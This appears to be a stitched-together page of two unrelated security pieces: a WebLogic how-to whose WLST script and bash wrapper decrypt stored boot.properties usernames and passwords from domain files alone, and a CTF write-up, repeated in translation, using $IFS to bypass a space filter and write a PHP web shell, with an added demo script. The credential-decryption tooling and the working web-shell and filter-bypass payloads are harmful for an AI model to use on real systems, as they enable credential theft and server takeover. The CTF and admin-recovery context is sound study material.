WebLogic Password Recovery

Title : How to recover the Password in WebLogic Server

Follow the steps below to recover a password (or username) that WebLogic Server has stored encrypted in a domain, such as the boot identity in boot.properties. Decryption needs only the domain's SerializedSystemIni.dat key file and the ciphertext, so anyone who can read both can recover the plaintext; protect the domain's security directory accordingly.

Step 1:

Run setWlstEnv.sh for setting up the environment variables.

Example:

. /u01/Middleware/oracle_common/common/bin/setWlstEnv.sh

Step 2:

WebLogic password recovery command (the domain directory is the first argument; the encrypted value, including its {AES} prefix, is the second):

[oracle@localhost bin]$ /opt/installations/tools/jdk1.7.0_55/bin/java weblogic.WLST decryptpassword.py /opt/ntdomain/domains/NT {AES}68+XWFqzaQdP5DmEgmkJZWnRWtIvjBd7v+y6h49tCd0\=

Initializing WebLogic Scripting Tool (WLST) …

Welcome to WebLogic Server Administration Scripting Shell

Type help() for help on available commands
========================================
Decrypted Password:p0o9i8u7
========================================

Step 3:

WebLogic username recovery command (the username is encrypted with the same domain key, so the same script recovers it):

[oracle@localhost bin]$ /opt/installations/tools/jdk1.7.0_55/bin/java weblogic.WLST decryptpassword.py /opt/ntdomain/domains/NT {AES}WsnwdqROocsh6D1YOclnc1ySRyzheBNtZD2AGLnjIFM\=

Initializing WebLogic Scripting Tool (WLST) …

Welcome to WebLogic Server Administration Scripting Shell

Type help() for help on available commands
========================================
Decrypted Password:weblogic
========================================


decryptpassword.py:

import os
import sys
import weblogic.security.internal.SerializedSystemIni
import weblogic.security.internal.encryption.ClearOrEncryptedService

def decryptString(domainPath, encryptedString):
    # Load the domain key from <domainPath>/security/SerializedSystemIni.dat
    # and build the encryption service bound to it.
    es = weblogic.security.internal.SerializedSystemIni.getEncryptionService(domainPath)
    # ClearOrEncryptedService accepts {AES}/{3DES}-prefixed ciphertext as well
    # as clear text, so the value can be passed exactly as it appears on disk.
    ces = weblogic.security.internal.encryption.ClearOrEncryptedService(es)
    decryptedString = ces.decrypt(encryptedString)
    print "=" * 70
    print " " * 10 + "Decrypted Password:" + decryptedString
    print "=" * 70

try:
    #os.system('clear')
    # WLST puts the script name in sys.argv[0], so two user arguments
    # give len(sys.argv) == 3.
    if len(sys.argv) == 3:
        decryptString(sys.argv[1], sys.argv[2])
    else:
        print "=" * 70
        print "INVALID ARGUMENTS"
        print "Usage: java weblogic.WLST %s <domainPath> <encryptedString>" % sys.argv[0]
        print "example.:"
        print "    java weblogic.WLST %s /oracle/fmwhome/user_projects/domains/NT/ {AES}68+XWFqzaQdP5DmEgmkJZWnRWtIvjBd7v+y6h49tCd0\=" % sys.argv[0]
        print "=" * 70
except:
    print "Unexpected error: ", sys.exc_info()[0]
    # dumpStack() is a WLST built-in that prints the Java stack trace.
    dumpStack()
    raise
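To run the three steps above over a whole boot identity file rather than one value at a time, here is an added shell wrapper (not from the original page) around the page's decryptpassword.py. It assumes setWlstEnv.sh has already been sourced so that java can find weblogic.WLST, that the DECRYPT_PY variable points at the script, and that the domain keeps its AdminServer boot identity at the usual servers/AdminServer/security/boot.properties path; the boot.properties sample it writes is constructed for offline testing, using the two ciphertexts shown on the page.

```shell
#!/usr/bin/env bash
# Added example, not from the original page: batch-decrypt every encrypted
# value in a domain's boot.properties with the page's decryptpassword.py.
# Assumptions: setWlstEnv.sh has been sourced (weblogic.WLST on the
# classpath) and DECRYPT_PY points at decryptpassword.py.

# Print "key value" for each encrypted entry in a boot.properties-style file.
# WebLogic prefixes ciphertext with {AES} (or {3DES} on older releases);
# comment lines and clear-text entries are skipped.
extract_encrypted_values() {
  local file="$1"
  grep -E '^[[:space:]]*[A-Za-z0-9_.-]+=[{](AES|3DES)[}]' "$file" \
    | sed -E 's/^[[:space:]]*([A-Za-z0-9_.-]+)=(.*)$/\1 \2/'
}

# Decrypt a single ciphertext with the WLST script and keep only the
# "Decrypted Password:" line, dropping the WLST banner printed before it.
decrypt_one() {
  local domain_dir="$1" ciphertext="$2"
  java weblogic.WLST "${DECRYPT_PY:-./decryptpassword.py}" \
      "$domain_dir" "$ciphertext" 2>/dev/null \
    | sed -n 's/.*Decrypted Password://p'
}

# Decrypt the AdminServer boot identity of a domain and print key=plaintext.
decrypt_boot_properties() {
  local domain_dir="$1"
  local bp="$domain_dir/servers/AdminServer/security/boot.properties"
  extract_encrypted_values "$bp" | while read -r key value; do
    printf '%s=%s\n' "$key" "$(decrypt_one "$domain_dir" "$value")"
  done
}

# Constructed sample of a boot.properties file, for offline testing only.
write_sample_boot_properties() {
  cat > "$1" <<'EOF'
# Generated by Configuration Wizard (constructed sample)
username={AES}WsnwdqROocsh6D1YOclnc1ySRyzheBNtZD2AGLnjIFM=
password={AES}68+XWFqzaQdP5DmEgmkJZWnRWtIvjBd7v+y6h49tCd0=
EOF
}

# Usage: ./decrypt_boot.sh /opt/ntdomain/domains/NT
if [ "${1:-}" ]; then
  decrypt_boot_properties "$1"
fi
```

The wrapper reads nothing but the domain directory, which is the point: no running server, no admin console and no WebLogic password is needed, only file access to the domain. The same `extract_encrypted_values` pass works on any properties-style file that carries {AES} values.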

Executing Bash commands without spaces (bypassing a space filter to run Bash commands)

Original link: http://0xa.li/executing-bash-commands-without-space/
Hello everyone. During a CTF competition, my teammate @aboul3la and I found a command injection in one of the web application challenges.
If you input `>file.txt`, the server creates a file called file.txt.
We wanted to write a PHP shell, like this:
echo "<?PHP CODE>" > file.php
The problem was that the challenge filtered spaces and rejected any input containing one (Error: Not valid URL).
So we tried many ways around it. The first idea was to obtain a space by decoding it from hex or some other encoding, but none of those worked after the echo.

Then I searched to see whether Linux itself already defines the space somewhere.
It does: $IFS.

The solution is:
echo$IFS"<?=system(\$_GET[x]);?>">shell.php
If you need to download something: wget$IFS"https://google.com/robots.txt"


English original:
Hello, world.

So I was in this CTF competition and my teammate (@aboul3la) found a command injection vulnerability in one of web application challenges.

If you input >file.txt the server creates a file called file.txt.

We wanted to write a PHP shell to the server (echo "<?PHP CODE>" > file.php)
But the thing is, the challenge had a filter that won’t allow you to have a space in the input (Error: Not valid URL)

So we tried around and my first thought was to use some decoding mechanism to decrypt "space" from its hex equivalent or something, but we couldn't do it without a space after the "echo"
Then I thought I should search and see if the space (or tab) is defined in Linux itself.
And I found it: $IFS.

The solution was:
echo$IFS"<?=system($_GET[x]);?>">shell.php

If you wanted to wget something: wget$IFS"https://google.com/robots.txt"
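The trick above relies on two shell behaviours worth seeing side by side: unquoted $IFS expands to whitespace that word splitting then consumes as a separator, and a variable name ends only at a character that cannot belong to it, so `$IFShttps` is a lookup of a variable named IFShttps, not `$IFS` followed by `https`. The following added example (not part of the original post) reproduces the challenge's space-rejecting filter, runs the payloads through /bin/sh the way a vulnerable system() call would, and shows what each one actually writes to disk. The filter function, the scratch directory and the file names are assumptions made for the demo; example.invalid stands in for the download URL, and printf stands in for wget so that the block runs offline.

```shell
#!/usr/bin/env bash
# Added example, not part of the original post: a stand-in for the challenge's
# space-rejecting filter, plus payloads that smuggle a separator past it with
# $IFS. The filter, scratch directory and file names are assumptions made
# for this demo.

# Mimic the challenge filter: reject any input containing a literal space
# (the "Error: Not valid URL" case).
space_filter_accepts() {
  case "$1" in
    *' '*) return 1 ;;
    *)     return 0 ;;
  esac
}

# Push one injected fragment through the filter and then through /bin/sh, the
# way a vulnerable system("cmd " . $input) would, inside a scratch directory.
# Prints the contents of the file the payload was meant to write; returns 1
# without running anything if the filter rejects the payload.
run_payload() {
  local payload="$1" outfile="$2"
  space_filter_accepts "$payload" || return 1
  local dir
  dir="$(mktemp -d)"
  ( cd "$dir" && sh -c "$payload" )
  cat "$dir/$outfile"
  rm -rf "$dir"
}

# A plain space never reaches the shell: the filter stops it.
payload_with_space='echo "<?=system($_GET[x]);?>" >shell.php'

# Unquoted $IFS expands to space/tab/newline, which word splitting treats as a
# separator, so the shell runs: echo "<?=system($_GET[x]);?>" >shell.php
# The \$ stops the shell from expanding $_GET to an empty string inside the
# double quotes; the literal $_GET[x] is what must land in the PHP file.
payload_ifs='echo$IFS"<?=system(\$_GET[x]);?>">shell.php'

# Braces (or a quote, as in the post's wget$IFS"https://...") are needed when
# the next character could continue a variable name: $IFShttps is read as a
# variable called IFShttps, which is unset, so "https" silently disappears.
payload_braces='printf${IFS}%s${IFS}https://example.invalid/robots.txt>url.txt'
payload_bad='printf$IFS%s$IFShttps://example.invalid/robots.txt>bad.txt'

# Usage: ./ifs_demo.sh demo
if [ "${1:-}" = demo ]; then
  run_payload "$payload_with_space" shell.php || echo "blocked by filter"
  run_payload "$payload_ifs" shell.php
  run_payload "$payload_braces" url.txt
  run_payload "$payload_bad" bad.txt
fi
```

The bypass works only where the shell performs word splitting, that is, on an unquoted expansion; inside single quotes `$IFS` stays literal. On the defensive side, the filter is the wrong control: stripping spaces does nothing about a command injection, and the fix is to stop passing user input to a shell at all.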